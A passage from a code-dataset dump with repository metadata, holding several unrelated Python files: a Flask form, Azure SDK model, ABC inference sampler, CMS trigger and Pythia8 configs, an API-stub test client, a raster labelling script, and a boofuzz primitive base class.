] | null | null | null | from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
class AlbumForm(FlaskForm):
title = StringField('Название альбома', validators=[DataRequired()])
submit = SubmitField('Подтвердить') | 32.875 | 72 | 0.798479 |
795c6c4a8279b0f4c33350f3854f79649570c0c2 | 1,042 | py | Python | src/datamigration/azext_dms/vendored_sdks/datamigration/models/name_availability_request.py | rahulgouthamDOTgs/azure-cli-extensions | a1b1198431c25dd88a3f9894712dfc394bba1b19 | [
"MIT"
] | null | null | null | src/datamigration/azext_dms/vendored_sdks/datamigration/models/name_availability_request.py | rahulgouthamDOTgs/azure-cli-extensions | a1b1198431c25dd88a3f9894712dfc394bba1b19 | [
"MIT"
] | null | null | null | src/datamigration/azext_dms/vendored_sdks/datamigration/models/name_availability_request.py | rahulgouthamDOTgs/azure-cli-extensions | a1b1198431c25dd88a3f9894712dfc394bba1b19 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class NameAvailabilityRequest(Model):
"""A resource type and proposed name.
:param name: The proposed resource name
:type name: str
:param type: The resource type chain (e.g. virtualMachines/extensions)
:type type: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, name=None, type=None):
super(NameAvailabilityRequest, self).__init__()
self.name = name
self.type = type
| 31.575758 | 76 | 0.571977 |
795c6c5c0d96d0539b9126c4a22a5711199aa564 | 193 | py | Python | config.py | trevorstam/text-similarity | 5a549ef5900ca2522ddfd5ee7accf3358d10ca22 | [
"MIT"
] | null | null | null | config.py | trevorstam/text-similarity | 5a549ef5900ca2522ddfd5ee7accf3358d10ca22 | [
"MIT"
] | null | null | null | config.py | trevorstam/text-similarity | 5a549ef5900ca2522ddfd5ee7accf3358d10ca22 | [
"MIT"
] | null | null | null | import os
from dotenv import load_dotenv
load_dotenv()
PGHOST = os.getenv('PGHOST')
PGDBNAME = os.getenv('PGDBNAME')
PGUSERNAME = os.getenv('PGUSERNAME')
PGPASSWORD = os.getenv('PGPASSWORD')
| 19.3 | 36 | 0.756477 |
795c6c6501ddd6bb44b164a3d035c2f621eb530d | 7,295 | py | Python | _dev/inferences/rejection_abc.py | nicolossus/pylfi | 7950aff5c36e7368cbe77b32ef348966b905f5cf | [
"MIT"
] | null | null | null | _dev/inferences/rejection_abc.py | nicolossus/pylfi | 7950aff5c36e7368cbe77b32ef348966b905f5cf | [
"MIT"
] | null | null | null | _dev/inferences/rejection_abc.py | nicolossus/pylfi | 7950aff5c36e7368cbe77b32ef348966b905f5cf | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
import time
import numpy as np
from pylfi.inferences import ABCBase
from pylfi.journal import Journal
from pylfi.utils import setup_logger
from tqdm.auto import tqdm
class RejectionABC(ABCBase):
"""Rejection ABC.
"""
def __init__(self, observation, simulator, priors, distance='l2',
rng=np.random.RandomState, seed=None):
"""
simulator : callable
simulator model
summary_calculator : callable, defualt None
summary statistics calculator. If None, simulator should output
sum stat
distance : str
Can be a custom function or one of l1, l2, mse
distance_metric : callable
discrepancy measure
"""
# self._obs = observation
# self._simulator = simulator # model simulator function
# self._priors = priors
# self._distance = distance # distance metric function
super().__init__(
observation=observation,
simulator=simulator,
priors=priors,
distance=distance,
rng=rng,
seed=seed
)
def __call__(self, num_simulations, epsilon, lra=False):
journal = self.sample(num_simulations, epsilon, lra)
return journal
def sample(self, n_sims=None, n_samples=None, epsilon=0.5, log=True):
"""
add **kwargs for simulator call?
Pritchard et al. (1999) algorithm
n_samples: integer
Number of samples to generate
epsilon : {float, str}
Default 'adaptive'
Notes
-----
Specifying the 'n_simulations' is generally a faster computation than
specifying 'n_samples', but with the trade-off that the number of
posterior samples will be at the mercy of the configuration
lra bool, Whether to run linear regression adjustment as in Beaumont et al. 2002
"""
self._t0 = time.time()
_inference_scheme = "Rejection ABC"
self._log = log
self._epsilon = epsilon
if self._log:
self.logger = setup_logger(self.__class__.__name__)
self.logger.info(f"Initialize {_inference_scheme} sampler.")
if n_sims is None and n_samples is None:
msg = ("One of 'n_sims' or 'n_samples' must be specified.")
raise ValueError(msg)
if n_sims is not None and n_samples is not None:
msg = ("Cannot specify both 'n_sims' and 'n_samples'.")
raise ValueError(msg)
# initialize journal
self._journal = Journal()
self._journal._start_journal(log, self._simulator, self._priors,
_inference_scheme, self._distance, n_sims, epsilon)
if n_sims is not None:
if isinstance(n_sims, int):
# call rejection loop
self._sampler_n_sims(n_sims)
else:
msg = ("The number of simulations must be given as an integer.")
raise TypeError(msg)
if n_samples is not None:
if isinstance(n_samples, int):
# call rejection loop
self._sampler_n_samples(n_samples)
else:
msg = ("The number of samples must be given as an integer.")
raise TypeError(msg)
return self._journal
def _sampler_n_sims(self, n_sims):
"""Sampling loop for specified number of simulations"""
# draw thetas from priors
thetas = np.array([prior.rvs(
size=(n_sims,), rng=self._rng, seed=self._seed) for prior in self._priors])
# run simulator
if self._log:
self.logger.info(f"Run simulator with prior samples.")
sims = []
for i, theta in enumerate(tqdm(np.stack(thetas, axis=-1),
desc="Simulation progress",
position=0,
leave=True,
colour='green')):
sim = self._simulator(*theta)
sims.append(sim)
sims = np.array(sims)
else:
sims = np.array([self._simulator(*thetas)
for thetas in np.stack(thetas, axis=-1)])
# calculate distances
distances = np.array([self._distance(self._obs, sim) for sim in sims])
# acceptance criterion
is_accepted = distances <= self._epsilon
# accepted simulations
n_accepted = is_accepted.sum().item()
thetas_accepted = thetas[:, is_accepted]
dist_accepted = distances[is_accepted]
sims_accepted = sims[is_accepted]
if self._log:
self.logger.info(f"Accepted {n_accepted} of {n_sims} simulations.")
self._journal._processing_msg()
for i, thetas in enumerate(np.stack(thetas_accepted, axis=-1)):
self._journal._add_accepted_parameters(thetas)
self._journal._add_distance(dist_accepted[i])
self._journal._add_rel_distance(sims_accepted[i] - self._obs)
self._journal._add_threshold(self._epsilon)
self._journal._add_sumstats(sims_accepted[i])
'''Rework this'''
# if num_accepted < ... : raise RuntimeError eller custom InferenceError
t1 = time.time() - self._t0
self._journal._process_inference(n_sims, n_accepted, t1)
if self._log:
self._journal._done_msg()
def _sampler_n_samples(self, n_samples):
"""Sampling loop for specified number of posterior samples"""
n_sims = 0
n_accepted = 0
if self._log:
self.logger.info("Run sampler.")
pbar = tqdm(total=n_samples,
desc="Sampling progress",
position=0,
leave=True,
colour='green')
while n_accepted < n_samples:
if self._seed is None:
thetas = [prior.rvs(rng=self._rng) for prior in self._priors]
else:
thetas = [prior.rvs(rng=self._rng, seed=self._seed + n_sims)
for prior in self._priors]
sim = self._simulator(*thetas)
n_sims += 1
distance = self._distance(self._obs, sim)
if distance <= self._epsilon:
if self._log:
pbar.update(1)
n_accepted += 1
self._journal._add_accepted_parameters(thetas)
self._journal._add_distance(distance)
self._journal._add_rel_distance(sim - self._obs)
self._journal._add_threshold(self._epsilon)
self._journal._add_sumstats(sim)
if self._log:
pbar.close()
self.logger.info(f"Sampler ran {n_sims} simulations to "
+ f"obtain {n_accepted} samples.")
self._journal._processing_msg()
t1 = time.time() - self._t0
self._journal._process_inference(n_sims, n_accepted, t1)
if self._log:
self._journal._done_msg()
| 34.904306 | 88 | 0.566141 |
795c6cb6253495756f4dac8b5bf0a659e980d45b | 360 | py | Python | task_scripts/init_db.py | ZettaAI/Synaptor | e425b4c744fca093ee5c63f41b82b3cae7898af4 | [
"MIT"
] | 7 | 2018-04-01T18:18:23.000Z | 2021-09-13T07:02:16.000Z | task_scripts/init_db.py | ZettaAI/Synaptor | e425b4c744fca093ee5c63f41b82b3cae7898af4 | [
"MIT"
] | 5 | 2018-10-24T19:36:03.000Z | 2020-10-30T02:13:38.000Z | task_scripts/init_db.py | ZettaAI/Synaptor | e425b4c744fca093ee5c63f41b82b3cae7898af4 | [
"MIT"
] | 6 | 2018-07-12T17:59:54.000Z | 2020-10-30T02:29:50.000Z | """
Initializes a database with the proper tables, etc.
"""
import synaptor as s
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("storagestr")
args = parser.parse_args()
args.storagestr = s.io.parse_storagestr(args.storagestr)
print(vars(args))
s.proc.io.initdb.drop_db(args.storagestr)
s.proc.io.initdb.init_db(args.storagestr)
| 17.142857 | 56 | 0.769444 |
795c6ed7d3258dd6c904fab685fc42dc89a8bea2 | 7,795 | py | Python | L1Trigger/L1TMuonEndCap/python/simEmtfDigis_cfi.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | L1Trigger/L1TMuonEndCap/python/simEmtfDigis_cfi.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | L1Trigger/L1TMuonEndCap/python/simEmtfDigis_cfi.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | import FWCore.ParameterSet.Config as cms
# EMTF emulator configuration
# Check that proper switches are implemented in L1Trigger/Configuration/python/customiseReEmul.py - AWB 02.06.17
###############################################################################################
### IMPORTANT!!! Any changes to this file should be reflected in the 2016, 2017, and 2018 ###
### configurations in configure_by_fw_version in src/SectorProcessor.cc ###
###############################################################################################
simEmtfDigisMC = cms.EDProducer("L1TMuonEndCapTrackProducer",
# Verbosity level
verbosity = cms.untracked.int32(0),
# Configure by firmware version, which may be different than the default parameters in this file
FWConfig = cms.bool(True),
# Input collections
# Three options for CSCInput
# * 'simCscTriggerPrimitiveDigis','MPCSORTED' : simulated trigger primitives (LCTs) from re-emulating CSC digis
# * 'csctfDigis' : real trigger primitives as received by CSCTF (legacy trigger), available only in 2016 data
# * 'emtfStage2Digis' : real trigger primitives as received by EMTF, unpacked in EventFilter/L1TRawToDigi/
CSCInput = cms.InputTag('simCscTriggerPrimitiveDigis','MPCSORTED'),
RPCInput = cms.InputTag('simMuonRPCDigis'),
CPPFInput = cms.InputTag('simCPPFDigis'), ## Cannot use in MC workflow, does not exist yet. CPPFEnable set to False - AWB 01.06.18
GEMInput = cms.InputTag('simMuonGEMPadDigis'),
# Run with CSC, RPC, GEM
CSCEnable = cms.bool(True), # Use CSC LCTs from the MPCs in track-building
RPCEnable = cms.bool(True), # Use clustered RPC hits from CPPF in track-building
CPPFEnable = cms.bool(False), # Use CPPF-emulated clustered RPC hits from CPPF as the RPC hits
GEMEnable = cms.bool(False), # Use hits from GEMs in track-building
# Era (options: 'Run2_2016', 'Run2_2017', 'Run2_2018')
Era = cms.string('Run2_2018'),
# BX
MinBX = cms.int32(-3), # Minimum BX considered
MaxBX = cms.int32(+3), # Maximum BX considered
BXWindow = cms.int32(2), # Number of BX whose primitives can be included in the same track
# CSC LCT BX offset correction
CSCInputBXShift = cms.int32(-8), # Shift applied to input CSC LCT primitives, to center at BX = 0
RPCInputBXShift = cms.int32(0),
GEMInputBXShift = cms.int32(0),
# Sector processor primitive-conversion parameters
spPCParams16 = cms.PSet(
PrimConvLUT = cms.int32(1), # v0 and v1 LUTs used at different times, "-1" for local CPPF files (only works if FWConfig = False)
ZoneBoundaries = cms.vint32(0,41,49,87,127), # Vertical boundaries of track-building zones, in integer theta (5 for 4 zones)
# ZoneBoundaries = cms.vint32(0,36,54,96,127), # New proposed zone boundaries
ZoneOverlap = cms.int32(2), # Overlap between zones
IncludeNeighbor = cms.bool(True), # Include primitives from neighbor chambers in track-building
DuplicateTheta = cms.bool(True), # Use up to 4 theta/phi positions for two LCTs in the same chamber
FixZonePhi = cms.bool(True), # Pattern phi slightly offset from true LCT phi; also ME3/4 pattern width off
UseNewZones = cms.bool(False), # Improve high-quality pattern finding near ring 1-2 gap in ME3/4
FixME11Edges = cms.bool(True), # Improved small fraction of buggy LCT coordinate transformations
),
# Sector processor pattern-recognition parameters
spPRParams16 = cms.PSet(
PatternDefinitions = cms.vstring(
# straightness, hits in ME1, hits in ME2, hits in ME3, hits in ME4
# ME1 vaues centered at 15, range from 0 - 30
# ME2,3,4 values centered at 7, range from 0 - 14
"4,15:15,7:7,7:7,7:7",
"3,16:16,7:7,7:6,7:6",
"3,14:14,7:7,8:7,8:7",
"2,18:17,7:7,7:5,7:5", # should be 7:4 in ME3,4 (FW bug)
"2,13:12,7:7,10:7,10:7",
"1,22:19,7:7,7:0,7:0",
"1,11:8,7:7,14:7,14:7",
"0,30:23,7:7,7:0,7:0",
"0,7:0,7:7,14:7,14:7",
),
SymPatternDefinitions = cms.vstring(
# straightness, hits in ME1, hits in ME2, hits in ME3, hits in ME4
"4,15:15:15:15,7:7:7:7,7:7:7:7,7:7:7:7",
"3,16:16:14:14,7:7:7:7,8:7:7:6,8:7:7:6",
"2,18:17:13:12,7:7:7:7,10:7:7:4,10:7:7:4",
"1,22:19:11:8,7:7:7:7,14:7:7:0,14:7:7:0",
"0,30:23:7:0,7:7:7:7,14:7:7:0,14:7:7:0",
),
UseSymmetricalPatterns = cms.bool(True), # 5 symmetric patterns instead of 9 asymmetric for track building
),
# Sector processor track-building parameters
spTBParams16 = cms.PSet(
ThetaWindow = cms.int32(8), # Maximum dTheta between primitives in the same track
ThetaWindowZone0 = cms.int32(4), # Maximum dTheta between primitives in the same track in Zone 0 (ring 1)
UseSingleHits = cms.bool(False), # Build "tracks" from single LCTs in ME1/1
BugSt2PhDiff = cms.bool(False), # Reduced LCT matching window in station 2, resulting in demoted tracks and inefficiency
BugME11Dupes = cms.bool(False), # LCTs matched to track may take theta value from other LCT in the same chamber
BugAmbigThetaWin = cms.bool(False), # Can allow dThetas outside window when there are 2 LCTs in the same chamber
TwoStationSameBX = cms.bool(True), # Requires the hits in two-station tracks to have the same BX
),
# Sector processor ghost-cancellation parameters
spGCParams16 = cms.PSet(
MaxRoadsPerZone = cms.int32(3), # Number of patterns that can be built per theta zone
MaxTracks = cms.int32(3), # Number of tracks that can be sent from each sector
UseSecondEarliest = cms.bool(True), # Second-earliest LCT used to assign BX, tracks cancel over 3 BX, improved LCT recovery
BugSameSectorPt0 = cms.bool(False), # Only highest-quality track in a sector assigned pT; others assigned pT = 0
),
# Sector processor pt-assignment parameters
spPAParams16 = cms.PSet(
ReadPtLUTFile = cms.bool(False),
FixMode15HighPt = cms.bool(True), # High-pT fix puts outlier LCTs in mode 15 tracks back in a straight line
Bug9BitDPhi = cms.bool(False), # dPhi wrap-around in modes 3, 5, 6, 9, 10, 12
BugMode7CLCT = cms.bool(False), # pT LUT written with incorrect values for mode 7 CLCT, mode 10 random offset
BugNegPt = cms.bool(False), # In all modes negative (1/pT) set to 3 instead of 511
BugGMTPhi = cms.bool(False), # Some drift in uGMT phi conversion, off by up to a few degrees
PromoteMode7 = cms.bool(False), # Assign station 2-3-4 tracks with |eta| > 1.6 SingleMu quality
ModeQualVer = cms.int32(2), # Version 2 contains modified mode-quality mapping for 2018
),
)
simEmtfDigisData = simEmtfDigisMC.clone(
CSCInput = cms.InputTag('emtfStage2Digis'),
RPCInput = cms.InputTag('muonRPCDigis'),
CPPFInput = cms.InputTag('emtfStage2Digis'),
GEMInput = cms.InputTag('muonGEMPadDigis'),
CPPFEnable = cms.bool(True), # Use CPPF-emulated clustered RPC hits from CPPF as the RPC hits
)
simEmtfDigis = simEmtfDigisMC.clone()
## Era: Run2_2016
#from Configuration.Eras.Modifier_stage2L1Trigger_cff import stage2L1Trigger
#stage2L1Trigger.toModify(simEmtfDigis, RPCEnable = cms.bool(False), Era = cms.string('Run2_2016'))
## Era: Run2_2017
#from Configuration.Eras.Modifier_stage2L1Trigger_2017_cff import stage2L1Trigger_2017
#stage2L1Trigger_2017.toModify(simEmtfDigis, RPCEnable = cms.bool(True), Era = cms.string('Run2_2017'))
| 55.678571 | 143 | 0.651058 |
795c717e07d93de4bd6f740c4a6e842cf67accde | 1,805 | py | Python | chatto_transform/datastores/datastore_base.py | chatto-hub-test2/github-permission | dfb364b3663965720ba8b907617a247fec0eff7f | [
"Unlicense",
"MIT"
] | 1 | 2021-07-23T11:52:14.000Z | 2021-07-23T11:52:14.000Z | chatto_transform/datastores/datastore_base.py | chatto-hub-test2/github-permission | dfb364b3663965720ba8b907617a247fec0eff7f | [
"Unlicense",
"MIT"
] | null | null | null | chatto_transform/datastores/datastore_base.py | chatto-hub-test2/github-permission | dfb364b3663965720ba8b907617a247fec0eff7f | [
"Unlicense",
"MIT"
] | null | null | null | class DataStore:
"""Base class - defines the DataStore abstraction.
A DataStore is an adapter between a pandas DataFrame and a storage medium.
Examples of storage media: HDF5 file format, SQL databases backed by SqlAlchemy,
PostgreSQL databases."""
def __init__(self, schema):
self.schema = schema
def storage_target(self):
raise NotImplementedError()
def load(self):
result = self._load()
self.schema.conform_df(result)
return result
def load_chunks(self):
for chunk in self._load_chunks():
self.schema.conform_df(chunk)
yield chunk
del chunk
def store(self, df):
df = df.copy()
self.schema.conform_df(df, storage_target=self.storage_target())
self._store(df)
del df #delete our copy
def store_chunks(self, chunks):
def conform_each(chunks):
for chunk in chunks:
chunk = chunk.copy()
self.schema.conform_df(chunk, storage_target=self.storage_target())
yield chunk
del chunk
self._store_chunks(conform_each(chunks))
def update(self, df):
df = df.copy()
self.schema.conform_df(df, storage_target=self.storage_target())
self._update(df)
del df #delete our copy
def delete(self):
raise NotImplementedError()
def exists(self):
raise NotImplementedError()
def _load(self):
raise NotImplementedError()
def _load_chunks(self):
raise NotImplementedError()
yield
def _store(self, df):
raise NotImplementedError()
def _store_chunks(self, chunk):
raise NotImplementedError()
def _update(self, df):
raise NotImplementedError()
| 27.769231 | 84 | 0.619391 |
795c71a15b9a7238c45e4e8188e5d7c7873e5eba | 2,029 | py | Python | GEN_SIM/Configuration/GenProduction/python/ThirteenTeV/HVDS/HVDS_MZP800_MDP20_Ctau10000mm_Pythia8_13TeV_cff.py | jwill24/Timing | 99c5712eae960646e02bbb796e91b584a9a96132 | [
"MIT"
] | 2 | 2017-10-19T12:28:53.000Z | 2019-05-22T14:36:05.000Z | GEN_SIM/Configuration/GenProduction/python/ThirteenTeV/HVDS/HVDS_MZP800_MDP20_Ctau10000mm_Pythia8_13TeV_cff.py | jwill24/Timing | 99c5712eae960646e02bbb796e91b584a9a96132 | [
"MIT"
] | null | null | null | GEN_SIM/Configuration/GenProduction/python/ThirteenTeV/HVDS/HVDS_MZP800_MDP20_Ctau10000mm_Pythia8_13TeV_cff.py | jwill24/Timing | 99c5712eae960646e02bbb796e91b584a9a96132 | [
"MIT"
] | 6 | 2017-09-13T13:16:10.000Z | 2019-01-28T17:39:51.000Z | import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
comEnergy = cms.double(13000.0),
pythiaHepMCVerbosity = cms.untracked.bool(False),
pythiaPylistVerbosity = cms.untracked.int32(1),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
processParameters = cms.vstring(
'ParticleDecays:limitTau0 = off',
'ParticleDecays:tau0Max = 10000000',
'HiddenValley:ffbar2Zv = on',
'HiddenValley:Ngauge = 3',
'4900023:mWidth = 0.01',
'HiddenValley:pTminFSR = .1',
'HiddenValley:alphaFSR = .8',
'HiddenValley:FSR = on',
'HiddenValley:fragment = on',
'HiddenValley:probVector = 0',
'PartonLevel:MPI = on',
'PartonLevel:ISR = on',
'PartonLevel:FSR = on',
'HadronLevel:Hadronize = on',
'4900023:onMode = off',
'4900023:onIfAny = 4900101',
'4900023:m0 = 800', #Z' mass
'4900101:m0 = .5',
'4900111:m0 = 20', #Dark Pion Mass
'4900111:mayDecay = on',
'4900111:addChannel 1 1. 0 22 22', #force dark pion to decay to diphotons
'4900111:tau0 = 10000', #Dark pion lifetime in mm
'4900211:mayDecay = off',
'-4900211:mayDecay = off'
),
parameterSets = cms.vstring('pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters')
)
)
ProductionFilterSequence = cms.Sequence(generator)
| 44.108696 | 93 | 0.514046 |
795c7210576dbcd8988eccca859fd3abe108f5cf | 6,052 | py | Python | packages/python-packages/apistubgentest/apistubgentest/_client.py | chlowell/azure-sdk-tools | c24ecb0fe9ccd75795dd0f3f7bca2f5f9508e644 | [
"MIT"
] | null | null | null | packages/python-packages/apistubgentest/apistubgentest/_client.py | chlowell/azure-sdk-tools | c24ecb0fe9ccd75795dd0f3f7bca2f5f9508e644 | [
"MIT"
] | null | null | null | packages/python-packages/apistubgentest/apistubgentest/_client.py | chlowell/azure-sdk-tools | c24ecb0fe9ccd75795dd0f3f7bca2f5f9508e644 | [
"MIT"
] | null | null | null | from datetime import datetime
from azure.core.paging import ItemPaged
from typing import Optional, Union, List, Any
from .models import FakeObject, FakeError, PetEnumPy3Metaclass
from azure.core import PipelineClient
from typing import Optional, Union
# pylint:disable=docstring-missing-return,docstring-missing-rtype
class DefaultValuesClient:
def with_simple_default(name: str = "Bill", *, age: int = 21) -> None:
pass
def with_simple_optional_defaults(name: Optional[str] = "Bill", *, age: Optional[int] = 21) -> None:
pass
def with_falsy_optional_defaults(*, string: Optional[str] = "", int: Optional[int] = 0, bool: Optional[bool] = False) -> None:
pass
def with_falsy_optional_defaults_and_docstring(*, string: Optional[str] = "", int: Optional[int] = 0, bool: Optional[bool] = False) -> None:
""" Adds the docstring, which exposes issues.
:keyword str string: String. Default value is "".
:keyword int int: Int. Default value is 0.
:keyword bool bool: Bool. Default value is False.
"""
pass
def with_optional_none_defaults(name: Optional[str] = None, *, age: Optional[int] = None) -> None:
pass
def with_class_default(my_class: Any = FakeObject) -> None:
pass
# pylint:disable=client-method-missing-type-annotations
def with_parsed_docstring_defaults(name, age, some_class):
""" Parsed docstring defaults.
:param name: Some dummy value, defaults
to "Bill". Extra text.
:type name: str
:param age: Something else, defaults
to 21. Extra text.
:type age: int
:param some_class: Some kind of class type, defaults to :py:class:`apistubgen.test.models.FakeObject`.
:type some_class: class
:rtype: None
"""
pass
def with_enum_defaults(enum1: Union[PetEnumPy3Metaclass, str] = "DOG", enum2: Union[PetEnumPy3Metaclass, str] = PetEnumPy3Metaclass.DOG) -> None:
pass
# pylint:disable=docstring-missing-return,docstring-missing-rtype
class Python3TypeHintClient:
def with_simple_typehints(self, name: str, age: int) -> str:
pass
def with_complex_typehints(self,
value: List[ItemPaged[Union[FakeObject, FakeError]]] # pylint: disable=line-too-long
) -> None:
pass
def with_variadic_typehint(self, *vars: str, **kwargs: "Any") -> None:
pass
def with_str_list_return_type(self) -> List[str]:
pass
def with_list_return_type(self) -> List["TestClass"]:
pass
def with_list_union_return_type(self) -> List[Union[str, int]]:
pass
def with_datetime_typehint(self, date: datetime) -> datetime:
pass
# pylint:disable=docstring-missing-return,docstring-missing-rtype
class Python2TypeHintClient:
def with_simple_typehints(
self,
name, # type: str
age # type: int
):
# type: (...) -> str
pass
def with_complex_typehints(self,
value # type: List[ItemPaged[Union[FakeObject, FakeError]]] # pylint: disable=line-too-long
):
# type: (...) -> None
pass
def with_variadic_typehint(
self,
*vars, # type: str
**kwargs # type: Any
):
# type: (*str, **Any) -> None
pass
def with_str_list_return_type(self):
# type: (...) -> List[str]
pass
def with_list_return_type(self):
# type: (...) -> List[TestClass]
pass
def with_list_union_return_type(self):
# type: (...) -> List[Union[str, int]]
pass
def with_datetime_typehint(
self,
date # type: datetime
):
# type: (...) -> datetime
pass
# pylint:disable=client-method-missing-type-annotations,docstring-missing-return,docstring-missing-rtype
class DocstringTypeHintClient:
def with_simple_typehints(self, name, age):
""" Simple typehints
:param str name: Name
:param int age: Age
:rtype: str
"""
pass
def with_complex_typehints(self, value):
""" Complex typehint
:param value: Value
:type value: List[ItemPaged[Union[FakeObject, FakeError]]]
:rtype: None
"""
pass
# pylint:disable=docstring-should-be-keyword
def with_variadic_typehint(self, *vars, **kwargs):
""" Variadic typehint
:param str vars: Args
:param Any kwargs: Kwargs
:rtype: None
"""
pass
def with_str_list_return_type(self):
"""" String list return
:rtype: List[str]
"""
pass
def with_list_return_type(self):
"""" String list return
:rtype: List[TestClass]
"""
pass
def with_list_union_return_type(self):
"""" List union return
:rtype: List[Union[str, int]]
"""
pass
def with_datetime_typehint(self, date):
""" With datetime
:param datetime date: Datetime
:rtype: datetime
"""
pass
class SpecialArgsClient:
def with_standard_names(self, *args, **kwargs) -> None:
pass
def with_nonstandard_names(self, *vars, **kwds) -> None:
pass
def with_no_args() -> None:
pass
def with_keyword_only_args(self, *, value, **kwargs) -> None:
pass
def with_positional_only_args(self, a, b, /, c) -> None:
pass
def with_sorted_kwargs(self, *, d, c, b, a, **kwargs) -> None:
pass
class PylintCheckerViolationsClient(PipelineClient):
def __init__(self, endpoint: str, connection_string: str):
self.endpoint = endpoint
self.connection_string = connection_string
def with_too_many_args(self, a: str, b: str, c: str, d: str, e:str , f: str, g: str, h: str, **kwargs: Any) -> None:
pass
def without_type_annotations(self, val) -> None:
pass
def without_return_annotation(self, val: str):
pass
| 27.139013 | 149 | 0.611038 |
795c735aea9c49fae36db7e6a77a5a9370b2d477 | 2,036 | py | Python | python/preprocess/monolabel.py | lewfish/cloud-buster | da31c4acea30bd97f68e1ff99dbbe11e0ba13db6 | [
"MIT"
] | null | null | null | python/preprocess/monolabel.py | lewfish/cloud-buster | da31c4acea30bd97f68e1ff99dbbe11e0ba13db6 | [
"MIT"
] | null | null | null | python/preprocess/monolabel.py | lewfish/cloud-buster | da31c4acea30bd97f68e1ff99dbbe11e0ba13db6 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# The MIT License (MIT)
# =====================
#
# Copyright © 2020 Azavea
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the “Software”), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import argparse
import copy
import os
import numpy as np
import rasterio as rio
def cli_parser() -> argparse.ArgumentParser:
parser = argparse.ArgumentParser()
parser.add_argument('--input', required=True, type=str)
parser.add_argument('--output', required=True, type=str)
parser.add_argument('--n', required=True, type=int)
return parser
if __name__ == '__main__':
args = cli_parser().parse_args()
if 'CURL_CA_BUNDLE' not in os.environ:
os.environ['CURL_CA_BUNDLE'] = '/etc/ssl/certs/ca-certificates.crt'
with rio.open(args.input, 'r') as ds:
profile = copy.copy(ds.profile)
width = ds.width
height = ds.height
profile.update(count=1, dtype=np.uint8)
data = (np.ones((1, width, height)) * args.n).astype(np.uint8)
with rio.open(args.output, 'w', **profile) as ds:
ds.write(data)
| 33.933333 | 75 | 0.714145 |
795c74235f5653f951a426c106a5ff2c5b82af4b | 155 | py | Python | testproj/queue.py | musicwarez/testproj | 88a6f95f58849cca455865358cfd0bec8a4437a0 | [
"BSD-3-Clause"
] | null | null | null | testproj/queue.py | musicwarez/testproj | 88a6f95f58849cca455865358cfd0bec8a4437a0 | [
"BSD-3-Clause"
] | null | null | null | testproj/queue.py | musicwarez/testproj | 88a6f95f58849cca455865358cfd0bec8a4437a0 | [
"BSD-3-Clause"
] | null | null | null | from Queue import Queue
queue = Queue()
for i in range(0, 3):
queue.put(i)
print queue.get_nowait()
print queue.get_nowait()
print queue.get_nowait() | 17.222222 | 24 | 0.722581 |
795c7446f0a1ef1c7067c648fb57dbfd0db6c8dc | 668 | py | Python | boofuzz/boofuzz/primitives/base_primitive.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | 2 | 2021-05-05T12:03:01.000Z | 2021-06-04T14:27:15.000Z | boofuzz/boofuzz/primitives/base_primitive.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | null | null | null | boofuzz/boofuzz/primitives/base_primitive.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | 2 | 2021-05-05T12:03:09.000Z | 2021-06-04T14:27:21.000Z | from ..fuzzable import Fuzzable
class BasePrimitive(Fuzzable):
"""
The primitive base class implements common functionality shared across most primitives.
"""
def __init__(self, *args, **kwargs):
super(BasePrimitive, self).__init__(*args, **kwargs)
self._fuzz_library = [] # library of static fuzz heuristics to cycle through.
def mutations(self, default_value):
for val in self._fuzz_library:
yield val
def encode(self, value, mutation_context):
if value is None:
value = b""
return value
def num_mutations(self, default_value):
return len(self._fuzz_library)
| 27.833333 | 91 | 0.655689 |
795c756cb4bd956ad2058a28f320b0a12cc9ea3d | 37,798 | py | Python | sets/generator/withpattern/codecs.py | ignacio-gallego/tbcnn_skill_pill | 66c3939e2944160c864b61495ac4c7aaa56acd18 | [
